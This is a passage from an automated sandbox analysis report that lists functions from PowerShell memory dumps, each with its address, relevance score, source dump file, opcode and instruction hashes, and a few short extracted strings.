                                                                                                                • Instruction Fuzzy Hash: E8F11662A1EB869FF75A9B285815974BFE0EF53210B0851FAD08DC71E3DD18EC0987A1
                                                                                                                Function 00007FFAAC339BE4 Relevance: .4, Instructions: 412COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 03a6b4d5e2e3ed8ed94b93b1b786c1d5716f72abfef0c0cccfe17ffc1a42021e
                                                                                                                • Instruction ID: 29e513081c82699da93b91f72b2847eea12b9e3e8bb838ee060b056f56630cb2
                                                                                                                • Opcode Fuzzy Hash: 03a6b4d5e2e3ed8ed94b93b1b786c1d5716f72abfef0c0cccfe17ffc1a42021e
                                                                                                                • Instruction Fuzzy Hash: 81C11622A0EB8A8FF79297684855974BBE1EF57211B1841FAD04ECB2D3DD18DC49C3E1
                                                                                                                Function 00007FFAAC33549D Relevance: .4, Instructions: 368COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 62133d636ab4cba5883c753044b3fcc93ec62a796141fdd7a1db15e51665229f
                                                                                                                • Instruction ID: b5c3041e605b15cd2765dcf0c937ef3af3755c21c7291c4a875065d735c94e17
                                                                                                                • Opcode Fuzzy Hash: 62133d636ab4cba5883c753044b3fcc93ec62a796141fdd7a1db15e51665229f
                                                                                                                • Instruction Fuzzy Hash: 03B14962A1FF8A8FFB959B684819975BBD1EF56210B0851BAD04DC72D3DD18DC0883E1
                                                                                                                Function 00007FFAAC338F01 Relevance: .3, Instructions: 308COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d8679128636c05dbbc85000cbf9e8914667b300eb2848d92fc01759bddbceae5
                                                                                                                • Instruction ID: f164c4341fb9c9395b645e8602069b397f50e1def336b68d583d01f30c138893
                                                                                                                • Opcode Fuzzy Hash: d8679128636c05dbbc85000cbf9e8914667b300eb2848d92fc01759bddbceae5
                                                                                                                • Instruction Fuzzy Hash: 2091042291EB8A8FE755973C9815974BBD1EF53221B0541FAD04DC7293D929EC0983D2
                                                                                                                Function 00007FFAAC26B565 Relevance: .3, Instructions: 255COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566079602.00007FFAAC260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC260000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac260000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b3c25860dbfbf9015f3efaf6f5c7e913c30810699c6489c7202802ad8e82415c
                                                                                                                • Instruction ID: 09d425a00364155fe158ca63ef36b02ee1dff99c054a702b9fde3e34d50a0453
                                                                                                                • Opcode Fuzzy Hash: b3c25860dbfbf9015f3efaf6f5c7e913c30810699c6489c7202802ad8e82415c
                                                                                                                • Instruction Fuzzy Hash: 57816370618A4D8FEBA8EF28C8557E977D1FB69300F14826AE84DC7395CE74D9448BC2
                                                                                                                Function 00007FFAAC33A64B Relevance: .2, Instructions: 168COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 21bf8f9e521ea9928924526a7f4e88cf59dccd221fc3609745c9b724fb1a9006
                                                                                                                • Instruction ID: 3f7cde68e1d5c77ef9f3dccb11d01f5f59ca0119bab9ef48c47aa5a8b3edfbe7
                                                                                                                • Opcode Fuzzy Hash: 21bf8f9e521ea9928924526a7f4e88cf59dccd221fc3609745c9b724fb1a9006
                                                                                                                • Instruction Fuzzy Hash: F8512821A0EF898FEB62DBA884549A5BBE1EF56311B0841FBD04DD71E3CA18DC49C391
                                                                                                                Function 00007FFAAC339E30 Relevance: .1, Instructions: 129COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d958afdcfbb55920988e978e79b06477e7f4d17e9c17424a67924666a800db23
                                                                                                                • Instruction ID: fc86f53f7d9448c9c7ff15ff4f203e915983604891f8e205ce9870726aeb31a9
                                                                                                                • Opcode Fuzzy Hash: d958afdcfbb55920988e978e79b06477e7f4d17e9c17424a67924666a800db23
                                                                                                                • Instruction Fuzzy Hash: 4C41063190EFC68FE75297688854968BFE0EF17211B1842FBD44ECB2E3C9189C08C3A1
                                                                                                                Function 00007FFAAC3355C2 Relevance: .1, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 135e7b8961db1bd0dc94ba5ea98ced5601ff7187b8591e4d19278b4cca477c93
                                                                                                                • Instruction ID: 02e7ee0128ae2dbfa69d69003af57522fb7ebff7cf0e96ebb6c5d92d0b1168d7
                                                                                                                • Opcode Fuzzy Hash: 135e7b8961db1bd0dc94ba5ea98ced5601ff7187b8591e4d19278b4cca477c93
                                                                                                                • Instruction Fuzzy Hash: E731FA92F1FFC74BFBA557685819978EAC1DF03210B5861B5E44EC72D3DD089C0842E2
                                                                                                                Function 00007FFAAC334594 Relevance: .1, Instructions: 100COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c2288a1986928d86c5badeca42fdacddc634db0f0f325a82de24236d8dcf91d5
                                                                                                                • Instruction ID: 9509b49df746927c02a90c6d029d88d3b1fe4fb3d665d3046a795443d7516987
                                                                                                                • Opcode Fuzzy Hash: c2288a1986928d86c5badeca42fdacddc634db0f0f325a82de24236d8dcf91d5
                                                                                                                • Instruction Fuzzy Hash: E8210962F1FF8A9BF3A59B285845D74EAC1EF96210B5850B9D04DC32E3DD1CDC4942E1
                                                                                                                Function 00007FFAAC26AFE4 Relevance: .1, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566079602.00007FFAAC260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC260000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac260000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0fe195215bad713526c953d21f8527d72e1550fbf9d31cf2f80c5d9ac14666ca
                                                                                                                • Instruction ID: a4a4bc348147a5c2bea0136ed2332d0332ce243c43b87ea0289c546e049cc0fa
                                                                                                                • Opcode Fuzzy Hash: 0fe195215bad713526c953d21f8527d72e1550fbf9d31cf2f80c5d9ac14666ca
                                                                                                                • Instruction Fuzzy Hash: C0314D3081924ECEFBB4AF14CC4ABF9B694FF52314F404138D45D86292DE39A94DCBA5
                                                                                                                Function 00007FFAAC263945 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566079602.00007FFAAC260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC260000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac260000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                • Instruction ID: 9cc390bfd69e02e625a591b3a8e92d9b9f1a8752ad4430dbe9a42068e6407eb9
                                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                • Instruction Fuzzy Hash: 8101677111CB0C8FD748EF0CE451AA5B7E0FB95364F50056DE58AC3665D736E881CB45
                                                                                                                Function 00007FFAAC33A531 Relevance: .0, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1566525771.00007FFAAC330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC330000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_7ffaac330000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 259d7c2924a1410a4598ac2c3ddfce3a4f095eba5d72baa4e7d8183966232579
                                                                                                                • Instruction ID: 30abaeeff8f9e6caf2c223e5907c20f4ce351efe6d80bbbc5fd85567b46f9802
                                                                                                                • Opcode Fuzzy Hash: 259d7c2924a1410a4598ac2c3ddfce3a4f095eba5d72baa4e7d8183966232579
                                                                                                                • Instruction Fuzzy Hash: 4DE04632A0D9198DFB54E69CE8466ECB3A1FB49230F1021B7D08EE2141EA2168164790

                                                                                                                Executed Functions

                                                                                                                Function 04D4E928 Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: uUX$uUX
                                                                                                                • API String ID: 0-3954662479
                                                                                                                • Opcode ID: be8936850c44f74ef4c52562a79ff473a345c7c1ced45db24df0e06bc490576d
                                                                                                                • Instruction ID: 17fdbb8e7ad6ecfbed99a930fba67dbe0c4acedc83a0b3bf5f60fa616327571f
                                                                                                                • Opcode Fuzzy Hash: be8936850c44f74ef4c52562a79ff473a345c7c1ced45db24df0e06bc490576d
                                                                                                                • Instruction Fuzzy Hash: 50B13D70E00219EFDB24CFA9D8857ADBBF2BF88314F148529D815E7294EB74A845CF81
                                                                                                                Function 04D4F1F8 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: uUX$uUX
                                                                                                                • API String ID: 0-3954662479
                                                                                                                • Opcode ID: b00633abd8a9206cb19bb8447d09be5e7ff488b315afb1406863a0deb18d9e67
                                                                                                                • Instruction ID: 89be4222006f9d8456fe22a13b2f2d7d973d521e15db67dae3e586bb45b55175
                                                                                                                • Opcode Fuzzy Hash: b00633abd8a9206cb19bb8447d09be5e7ff488b315afb1406863a0deb18d9e67
                                                                                                                • Instruction Fuzzy Hash: 6DB13E71E002099FDF24CFA9D88579DBBF2BF88314F14852DD855EB2A4EB74A845CB81
                                                                                                                Function 07B17C28 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$x.~k$-~k
                                                                                                                • API String ID: 0-9389243
                                                                                                                • Opcode ID: 27ba8bb4354193aed5bcbb3219625176ccd5fd4c510b723fa19ed817805e414c
                                                                                                                • Instruction ID: 8cfc818c10f2032ea6e6c03835956ef33d65b7fac647de34b89310aa0f0595d5
                                                                                                                • Opcode Fuzzy Hash: 27ba8bb4354193aed5bcbb3219625176ccd5fd4c510b723fa19ed817805e414c
                                                                                                                • Instruction Fuzzy Hash: C4D19FB0A002059FE724DBA4C550BAEBBA3FF88314F65C459E9016F395CF71EC428B91
                                                                                                                Function 07B166D5 Relevance: 10.3, Strings: 8, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$x.~k$-~k
                                                                                                                • API String ID: 0-9389243
                                                                                                                • Opcode ID: 3b22622b490e68261d05e8eb0cb6db09653969033cb8440e4edee5c4b4b69f21
                                                                                                                • Instruction ID: dd23d2b76bc9d53b8bfab88f7c1484a6d53fcfa242687cb464b994d0cf111aa3
                                                                                                                • Opcode Fuzzy Hash: 3b22622b490e68261d05e8eb0cb6db09653969033cb8440e4edee5c4b4b69f21
                                                                                                                • Instruction Fuzzy Hash: B0D172B0A002159FEB24DB94D950B9ABBB2FB84708F5184D9E9096F785CF31ED42CF91
                                                                                                                Function 07B12EF0 Relevance: 9.1, Strings: 7, Instructions: 341COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
                                                                                                                • API String ID: 0-2432477355
                                                                                                                • Opcode ID: 28dfc5000d448033bfac4ee75c89d366ac853b7d4661c864ea25a024f24a4e9a
                                                                                                                • Instruction ID: 61432d1caa13476baefb7a2e1f2e60444ae7007587afb9d925f827c9ffd1ec38
                                                                                                                • Opcode Fuzzy Hash: 28dfc5000d448033bfac4ee75c89d366ac853b7d4661c864ea25a024f24a4e9a
                                                                                                                • Instruction Fuzzy Hash: A3B149B1B043459FE7228B65D8157A6BFF1EF82210F5984EBE804CF292DA31DC45C7A2
                                                                                                                Function 07B16B5B Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$x.~k$x.~k$-~k
                                                                                                                • API String ID: 0-2471386863
                                                                                                                • Opcode ID: 79d5bff97082425588f289950f5361aca223b4e9e36d8ca373d8edb0d06bb844
                                                                                                                • Instruction ID: abbe12b7e4039f769fa70fd8fbbae43929014437803aeff72630f03d3959e357
                                                                                                                • Opcode Fuzzy Hash: 79d5bff97082425588f289950f5361aca223b4e9e36d8ca373d8edb0d06bb844
                                                                                                                • Instruction Fuzzy Hash: 39F161B0A002159FEB24DB54CA50FAA7BB3EF84704F5184D9E5096F791CB71ED428F91
                                                                                                                Function 07B17C0A Relevance: 6.5, Strings: 5, Instructions: 270COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$4'q$x.~k$-~k
                                                                                                                • API String ID: 0-2006747031
                                                                                                                • Opcode ID: 6efd17bf8c4d408d4dfc28b4ae7bbba334e2bfb92f30126b42fab00aa54092d1
                                                                                                                • Instruction ID: 5a6e743e269732d2456999bc283a8cfce8abf2ffb6cf9f7e5228c7ede94e8dd5
                                                                                                                • Opcode Fuzzy Hash: 6efd17bf8c4d408d4dfc28b4ae7bbba334e2bfb92f30126b42fab00aa54092d1
                                                                                                                • Instruction Fuzzy Hash: 34B19AF4A002059FEB25CF94C550BAABBB2FF88714F65C499E9016F395CB31E846CB91
                                                                                                                Function 04D4AE30 Relevance: 4.3, Strings: 3, Instructions: 516COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Hq$$q$$q
                                                                                                                • API String ID: 0-405414136
                                                                                                                • Opcode ID: 7744d5f63472a1f86688feaaab9021fb78dfe9cac2c3d3623caf6078180a21bd
                                                                                                                • Instruction ID: bd155b8897cd391504547946cb8558427ed9c0da11d8993d5f716878e9a516de
                                                                                                                • Opcode Fuzzy Hash: 7744d5f63472a1f86688feaaab9021fb78dfe9cac2c3d3623caf6078180a21bd
                                                                                                                • Instruction Fuzzy Hash: E7228134B042548FDB25EB24C8547AEB7B2BF89304F1580A9D909AB365DF35ED82CF91
                                                                                                                Function 07B104E0 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $q$$q$$q
                                                                                                                • API String ID: 0-3067366958
                                                                                                                • Opcode ID: 68d828f24c07235f50737c79945343d10c5c445cefa937a123f2ae07f7d43808
                                                                                                                • Instruction ID: ce40020a4b3fbed450cb4d167a29abe72e38b96a44eeb8c1ea19d8b0529afc17
                                                                                                                • Opcode Fuzzy Hash: 68d828f24c07235f50737c79945343d10c5c445cefa937a123f2ae07f7d43808
                                                                                                                • Instruction Fuzzy Hash: 7F4148F2B002168FEB246B6998502AEF7E5FFC4210B54856ADD05D7341DB31D98187A1
                                                                                                                Function 07B14410 Relevance: 3.3, Strings: 2, Instructions: 758COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q
                                                                                                                • API String ID: 0-1467158625
                                                                                                                • Opcode ID: 4ac81cb212b75e5f73e0c8e69defbb2b224712512d4dbf351044aa5a5ba283d0
                                                                                                                • Instruction ID: 3a566233d81bf2f73b64329849cf644a87a8f609a37fc2eec9c9d353d45cf259
                                                                                                                • Opcode Fuzzy Hash: 4ac81cb212b75e5f73e0c8e69defbb2b224712512d4dbf351044aa5a5ba283d0
                                                                                                                • Instruction Fuzzy Hash: 08629CB4B10205CFE714CB98C650B6ABBB2EB85304FA5C4A8D905AF755CB72EC46CB51
                                                                                                                Function 07B11020 Relevance: 3.0, Strings: 2, Instructions: 474COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q
                                                                                                                • API String ID: 0-1467158625
                                                                                                                • Opcode ID: a7078e1bbd53ebf6dddd32afc6885debd4f3eb9707a4dc7f571c5e2b39ad4cc4
                                                                                                                • Instruction ID: cb8c88adbd05cdb7dfc8f44e897629885a3abeaa6b661c4db045421a54fe1059
                                                                                                                • Opcode Fuzzy Hash: a7078e1bbd53ebf6dddd32afc6885debd4f3eb9707a4dc7f571c5e2b39ad4cc4
                                                                                                                • Instruction Fuzzy Hash: 38127DB4B00209DFEB14CB98D550B99BBB2FB89314F55C4A9EA059B745CB32EC42CB91
                                                                                                                Function 04D4E91D Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: uUX$uUX
                                                                                                                • API String ID: 0-3954662479
                                                                                                                • Opcode ID: d9de0a1fd1cc483613ebea45f029e982766f4a6c96f471a10b33be9a0cae5052
                                                                                                                • Instruction ID: 7fe9825d9fc170f57f110512f200eb751428f1c2d59bbedbaeccaf616c3521a3
                                                                                                                • Opcode Fuzzy Hash: d9de0a1fd1cc483613ebea45f029e982766f4a6c96f471a10b33be9a0cae5052
                                                                                                                • Instruction Fuzzy Hash: 86B14D70E00259EFDB20CFA9D8857ADBBF1BF88314F148529E815E7294EB74A845CF91
                                                                                                                Function 04D4F1EC Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: uUX$uUX
                                                                                                                • API String ID: 0-3954662479
                                                                                                                • Opcode ID: d3a8ee0c56e05a8bed68ca28f0e5ad357733ebcac7a7197e25dc7c3137a3ed17
                                                                                                                • Instruction ID: f523c7f30783017ccdbaf16b3c7c7190e514c634c23171c37d8252a824bd3117
                                                                                                                • Opcode Fuzzy Hash: d3a8ee0c56e05a8bed68ca28f0e5ad357733ebcac7a7197e25dc7c3137a3ed17
                                                                                                                • Instruction Fuzzy Hash: 49B13C70E002499FDF20CFA9D88579DBBF1BF88314F14852DD855EB2A4EB74A885CB91
                                                                                                                Function 04D4EF64 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: uUX$uUX
                                                                                                                • API String ID: 0-3954662479
                                                                                                                • Opcode ID: 9656427adbc1280386f010f7cfc7e2a469a5a02bf5033d14aa37c024dafcb769
                                                                                                                • Instruction ID: 976c7c12978f4debac403f7417090f5244cd6f77f3001ac3c40bd4effd9ca277
                                                                                                                • Opcode Fuzzy Hash: 9656427adbc1280386f010f7cfc7e2a469a5a02bf5033d14aa37c024dafcb769
                                                                                                                • Instruction Fuzzy Hash: 44715D71E002499FDF24CFA9C881B9EBBF1BF88314F14812DE415A7264DB74A842CF91
                                                                                                                Function 04D4EF70 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: uUX$uUX
                                                                                                                • API String ID: 0-3954662479
                                                                                                                • Opcode ID: 70467289d8dd5d5420014b9960ca0441e0b5d528e675a1c6baaec92886127397
                                                                                                                • Instruction ID: bec6db7fe10f37c2aef92d1e634a25b198ea6d9fd84331ae33409f6bbd5d1287
                                                                                                                • Opcode Fuzzy Hash: 70467289d8dd5d5420014b9960ca0441e0b5d528e675a1c6baaec92886127397
                                                                                                                • Instruction Fuzzy Hash: 2D713C71E002099FDB14CFA9C885B9EBBF2BFC8314F14852DE415A7264EB74A841CF91
                                                                                                                Function 07B14406 Relevance: 1.9, Strings: 1, Instructions: 670COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q
                                                                                                                • API String ID: 0-1807707664
                                                                                                                • Opcode ID: e6ca75faa7faaedb8e5ead8dca23f252059f2cb713b227ac8fd7589b5c996f4f
                                                                                                                • Instruction ID: f9e42940a73fd36d3fcbf2c6f64661b42968f9aaee7697d407e097d072d75123
                                                                                                                • Opcode Fuzzy Hash: e6ca75faa7faaedb8e5ead8dca23f252059f2cb713b227ac8fd7589b5c996f4f
                                                                                                                • Instruction Fuzzy Hash: 2D5278B4A10245CFEB14CF84C650E6ABBB2FB85314FA5C4A9E905AF355CB72EC46CB41
                                                                                                                Function 07B14653 Relevance: 1.8, Strings: 1, Instructions: 530COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q
                                                                                                                • API String ID: 0-1807707664
                                                                                                                • Opcode ID: 30c00a267e65b28e155936c65485e36cdb68e86801b421a0f52310d2d9efdd7a
